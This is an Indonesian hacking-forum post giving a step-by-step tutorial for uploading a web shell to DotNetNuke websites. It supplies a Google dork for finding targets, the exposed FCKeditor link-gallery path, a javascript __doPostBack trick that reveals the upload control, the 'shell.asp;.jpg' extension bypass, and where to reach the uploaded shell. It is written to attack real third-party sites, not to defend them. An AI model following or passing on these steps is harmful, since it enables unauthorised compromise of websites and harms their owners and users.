Hallo Para agan" semua :cheer:
Ane mau bikin tutor nih cara upload shell menggunakan bug DNN (Dot Net Nuke) ane perhatiin ko jarang yg bikin tutor akhir" ini y udah ane bikin aja nih tutorial buat ngeramaiin aja :tepuktangan:
Jadi apa itu DNN? Dan bagaimana caranya untuk menyerang?
DotNetNuke adalah platform open source untuk membuat website yg berbasis pada Microsoft .NET technology.
DotNetNuke banyak di gunakan pada Content Management System(CMS) untuk web pribadi,
Ok kita mulai1> Gunakan google dork ini untuk mencari target "inurl:/tabid/36/language/en-US/Default.aspx " pilih salah satu target. ingat ya jgn web lokal (id) kasian gan :hantu:2> Sekarang kita lihat web yg di klik tadi ganti tulisan ini pada tab urlmu : " /tabid/36/language/en-US/Default.aspx " dengan " /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx "
Jika web tidak vulnerable(atau tidak bisa di serang) maka halaman akan berubah seperti ini
![[Image: 330s2mc.png]](http://i43.tinypic.com/330s2mc.png)
tapi jangan berkecil hati gan,cs mungkin masih ada bug yg lain di dalam situs trsbt,seperti XSS,RFI,SQL..dll :sombong:
Tapi Jika web vuln akan tampak halaman seperti ini
![[Image: 153pg6t.png]](http://i43.tinypic.com/153pg6t.png)
lalu klik tombol file yg nantinya akan terlihat tulisan "Root",dibawah "File location"
setelah itu masukan code javascript ini pada tab url(tab yg biasa buat ngetik halaman
http://www.blabla.com) DAN tekan enter :
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
code trsbt akan memungkinkan agan untuk upload file dari Pc agan
Code:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob:
cara gampangnya tinggal rubah saja ekstensi shell agan,contoh:" yourshell.asp;.jpg "ATAU mungkin juga bisa menggunakan tamper data gan :ganteng:setelah memilih shell,agan klik Upload selected File![[Image: 29vlyt1.jpg]](http://oi41.tinypic.com/29vlyt1.jpg)
terserah agan untuk mengganti ekstensi , yg di atas hanya contohsekarang tinggal panggil shell aganbiasanya letak shell agan di mari : http://www.example.com/portals/0/shell.asp;.jpg.jpg dan Voila shell agan berhasil di upload 
